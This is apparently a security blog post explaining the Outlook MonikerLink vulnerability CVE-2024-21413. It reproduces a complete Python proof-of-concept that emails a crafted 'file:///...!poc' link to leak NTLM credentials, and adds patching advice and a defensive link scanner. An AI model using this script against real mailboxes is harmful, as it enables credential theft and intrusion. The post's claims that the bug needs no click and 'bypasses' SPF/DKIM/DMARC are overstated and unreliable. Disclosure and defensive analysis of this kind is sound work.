ElNiak


The Unseen 0-Click Threat Lurking in Your Inbox: CVE-2024-21413 Explained

Dive deep into CVE-2024-21413, a critical vulnerability in Microsoft Outlook that allows remote code execution, its implications, and how to protect your systems.


In the ever-evolving landscape of cybersecurity, a new critical vulnerability has emerged, targeting the ubiquitous email client that many of us rely on daily: Microsoft Outlook.

Dubbed CVE-2024-21413, this vulnerability has raised alarms across the cybersecurity community due to its potential to allow attackers to execute arbitrary code remotely, without requiring any user interaction.

This article aims to shed light on CVE-2024-21413, exploring its impact, the mechanics behind the vulnerability, and the steps users and organizations can take to protect themselves.

What is CVE-2024-21413?

CVE-2024-21413 is a remote code execution vulnerability found in Microsoft Office Outlook.

Classified as critical, this vulnerability can compromise the confidentiality, integrity, and availability of the affected system.

It exploits the Outlook Preview Pane as an attack vector, enabling malicious code execution in editing mode instead of the restricted Protected View.

The Severity of the Threat

With a Common Vulnerability Scoring System (CVSS) score of 9.8, CVE-2024-21413 is among the most severe threats disclosed in recent times.

Its criticality stems from the ability to execute code remotely without any user interaction, bypassing traditional security measures like Office Protected View.

This level of vulnerability opens the door for attackers to carry out sophisticated cyberattacks, ranging from data theft to deploying ransomware across an organization’s network.

How Does It Work?

CVE-2024-21413 leverages the Outlook Preview Pane as a gateway for attacks. Typically, Microsoft Office employs Protected View as a sandboxing technique to prevent potentially harmful documents from executing code without user consent.

However, this vulnerability circumvents these protections, allowing malicious code to run as soon as the email is previewed.

This breach can occur without clicking or opening the email, making it particularly insidious and difficult to detect before it’s too late.

Exploiting CVE-2024-21413: The #MonikerLink Bug Unveiled

CVE-2024-21413, termed the #MonikerLink bug, represents a severe security flaw within Microsoft Outlook.

Its discovery underscores a significant risk, including potential local NTLM information leakage and remote code execution capabilities.

This vulnerability uniquely stands out as it can circumvent the security measures of Office Protected View, posing a broader threat spectrum across various Office applications.

The Technical Breakdown

The exploitation of CVE-2024-21413 involves a sophisticated attack vector that manipulates the email preview feature of Outlook to execute malicious code without user interaction.

The #MonikerLink bug showcases an attacker’s ability to bypass stringent email validation protocols such as SPF, DKIM, and DMARC, employing SMTP authentication to deliver a payload directly to the victim’s inbox, thus evading traditional email security measures.

Proof of Concept (PoC) Demonstration

A detailed Proof of Concept (PoC) (by Alexander Hagenah) outlines the steps for exploiting CVE-2024-21413, utilizing SMTP authentication to send an email that bypasses common security checks.

The PoC script requires parameters like SMTP server details, sender and recipient email addresses, and the malicious URL.

This demonstration provides a real-world scenario of how attackers could leverage this vulnerability to execute remote code on a victim’s system without raising any alarms.

  • Initial Sending: The email is sent using the specified SMTP server, targeting the recipient with a crafted message containing the malicious link.
  • Display in Outlook: Upon receipt, the email displays in the Outlook Preview Pane without any warnings or restrictions, demonstrating the bypass of Protected View.
  • Capturing Credentials: The attack’s effectiveness is further illustrated through a Wireshark capture, showing the interception of NTLM credentials, a critical security breach that could lead to further network compromise.
import smtplib
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
import argparse
import sys
# from: https://raw.githubusercontent.com/xaitax/CVE-2024-21413-Microsoft-Outlook-Remote-Code-Execution-Vulnerability/main/CVE-2024-21413.py

BLUE = "\033[94m"
GREEN = "\033[92m"
RED = "\033[91m"
ENDC = "\033[0m"

def display_banner():
    banner = f"""
{BLUE}CVE-2024-21413 | Microsoft Outlook Remote Code Execution Vulnerability PoC.
Alexander Hagenah / @xaitax / [email protected]{ENDC}
"""
    print(banner)

def send_email(smtp_server, port, username, password, sender_email, recipient_email, link_url, subject):

    """Sends an email with both plain text and HTML parts, including advanced features."""
    msg = MIMEMultipart('alternative')
    msg['Subject'] = subject
    msg['From'] = sender_email
    msg['To'] = recipient_email

    text = "Please read this email in HTML format."
    base64_image_string = "data:image/png;base64,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"

    html = f"""\
    <html>
    <body>
        <img src="{base64_image_string}" alt="Image"><br />
        <h1><a href="file:///{link_url}!poc">CVE-2024-21413 PoC.</a></h1>
    </body>
    </html>
    """

    part1 = MIMEText(text, 'plain')
    part2 = MIMEText(html, 'html')
    msg.attach(part1)
    msg.attach(part2)

    try:
        with smtplib.SMTP(smtp_server, port) as server:
            server.ehlo()
            server.starttls()
            server.ehlo()
            server.login(username, password)
            server.sendmail(sender_email, recipient_email, msg.as_string())
            print(f"{GREEN}✅ Email sent successfully.{ENDC}")
    except Exception as e:
        print(f"{RED}❌ Failed to send email: {e}{ENDC}")

def main():
    display_banner()
    parser = argparse.ArgumentParser(description="PoC for CVE-2024-21413 with SMTP authentication.")
    parser.add_argument('--server', required=True, help="SMTP server hostname or IP")
    parser.add_argument('--port', type=int, default=587, help="SMTP server port")
    parser.add_argument('--username', required=True, help="SMTP server username for authentication")
    parser.add_argument('--password', required=True, help="SMTP server password for authentication")
    parser.add_argument('--sender', required=True, help="Sender email address")
    parser.add_argument('--recipient', required=True, help="Recipient email address")
    parser.add_argument('--url', required=True, help="Malicious path to include in the email")
    parser.add_argument('--subject', required=True, help="Email subject")


    args = parser.parse_args()

    send_email(args.server, args.port, args.username, args.password, args.sender, args.recipient, args.url, args.subject)

if __name__ == "__main__":
    if len(sys.argv) == 1:
        display_banner()
        sys.exit(1)
    main()

Why SMTP Authentication Matters

The use of SMTP authentication in this exploit is pivotal, as it mirrors the tactics employed by sophisticated cyber attackers to navigate around established email security protocols.

By authenticating the email, attackers can give the appearance of legitimacy, increasing the likelihood of their malicious email being received and acted upon by the target.

This approach underscores the vulnerability’s criticality and the need for comprehensive security measures beyond standard email validation checks.

Protecting Against CVE-2024-21413

In response to the disclosure of CVE-2024-21413, Microsoft has released patches to mitigate the vulnerability.

Users and IT administrators are urged to apply these updates promptly to protect against potential exploits. The following measures are also recommended to enhance security:

  • Update Regularly: Ensure that your Microsoft Office suite is up-to-date with the latest security patches.
  • Educate Users: Raise awareness among users about the risks of phishing emails and the importance of caution when dealing with unexpected emails.
  • Implement Advanced Security Solutions: Utilize email security solutions that offer advanced threat protection capabilities, including scanning of email attachments and links for malicious content.
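
The link scanning recommended above can be made specific to this bug. The following is an added example, not part of the original article or the PoC repository: it parses a message, collects href and src values from its HTML parts, and flags file: URLs that carry a '!' suffix, the shape of the PoC's href. The function names, the sample message and the host.example placeholder are constructed for illustration.

```python
import email
from email import policy
from html.parser import HTMLParser
from urllib.parse import unquote


class LinkCollector(HTMLParser):
    """Collect href and src attribute values from every tag in an HTML body."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.urls = []

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            if name in ("href", "src") and value:
                self.urls.append(value.strip())


def is_moniker_link(url):
    """True for a file: URL whose path carries a '!' suffix (the PoC's href shape)."""
    decoded = unquote(url).strip()  # also catches an encoded %21
    if not decoded.lower().startswith("file:"):
        return False
    path = decoded[len("file:"):].lstrip("/\\")
    return "!" in path


def scan_message(raw_bytes):
    """Return the suspicious links found in the text/html parts of a message."""
    msg = email.message_from_bytes(raw_bytes, policy=policy.default)
    findings = []
    for part in msg.walk():
        if part.get_content_type() != "text/html":
            continue
        collector = LinkCollector()
        collector.feed(part.get_content())
        findings.extend(u for u in collector.urls if is_moniker_link(u))
    return findings


# Constructed sample message (not a real email); host.example is a placeholder.
SAMPLE = (
    b"From: sender@example.com\r\n"
    b"To: user@example.com\r\n"
    b"Subject: constructed sample\r\n"
    b"MIME-Version: 1.0\r\n"
    b"Content-Type: text/html; charset=utf-8\r\n"
    b"\r\n"
    b"<html><body>"
    b'<a href="file:///host.example/share/report.rtf!poc">report</a>'
    b'<a href="https://example.com/a!b">web link</a>'
    b'<a href="file:///C:/docs/readme.txt">local file</a>'
    b"</body></html>\r\n"
)

if __name__ == "__main__":
    for link in scan_message(SAMPLE):
        print("suspicious link:", link)
```

Legitimate file names can contain '!', so a hit is a signal for triage or quarantine rather than proof of an attack.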

Conclusion

CVE-2024-21413 is a stark reminder of the importance of cybersecurity vigilance. As cyber threats continue to evolve, staying informed and prepared is key to protecting sensitive information and systems.

By understanding the nature of such vulnerabilities and taking proactive steps to mitigate them, individuals and organizations can significantly reduce their risk of falling victim to cyberattacks.


For further reading on CVE-2024-21413 and detailed technical guidance, visit Microsoft’s official advisory and cybersecurity platforms that offer real-time updates on vulnerabilities and threats.


References:

  • Microsoft Security Response Center: For official advisories, patch information, and detailed descriptions of CVE-2024-21413. https://portal.msrc.microsoft.com/en-US/security-guidance
  • GitHub PoC Repository: Contains the proof of concept script and detailed explanation for CVE-2024-21413 exploitation. https://github.com/xaitax/CVE-2024-21413-Microsoft-Outlook-Remote-Code-Execution-Vulnerability
  • Check Point Research: Offers an in-depth analysis of the #MonikerLink bug, exploring its implications and the broader cybersecurity landscape. https://research.checkpoint.com/2024/the-risks-of-the-monikerlink-bug-in-microsoft-outlook-and-the-big-picture/